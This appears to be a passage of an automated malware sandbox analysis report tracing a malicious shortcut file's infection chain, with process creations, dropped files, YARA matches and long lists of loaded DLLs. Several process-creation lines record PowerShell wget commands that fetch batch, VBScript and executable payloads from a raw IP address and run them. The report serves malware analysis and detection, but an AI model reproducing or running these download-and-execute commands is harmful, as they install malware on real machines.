                      Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,16_2_00407776
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0040118A GetDiskFreeSpaceExW,SendMessageW,16_2_0040118A
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_004034C1
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,16_2_00401BDF
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\hello.bat
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1052:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdnnkvff.gsl.ps1
                      Source: Yara match File source: 17.0.DZIPR.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000011.00000000.2322852163.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000003.2318798588.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: C:\Users\user\DZIPR.exe, type: DROPPED
                      Source: Yara match File source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, type: DROPPED
                      Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                      Source: Dlr7HYI6VL.lnk ReversingLabs: Detection: 15%
                      Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exe Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
                      Source: C:\Users\user\DZIPR.exe Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
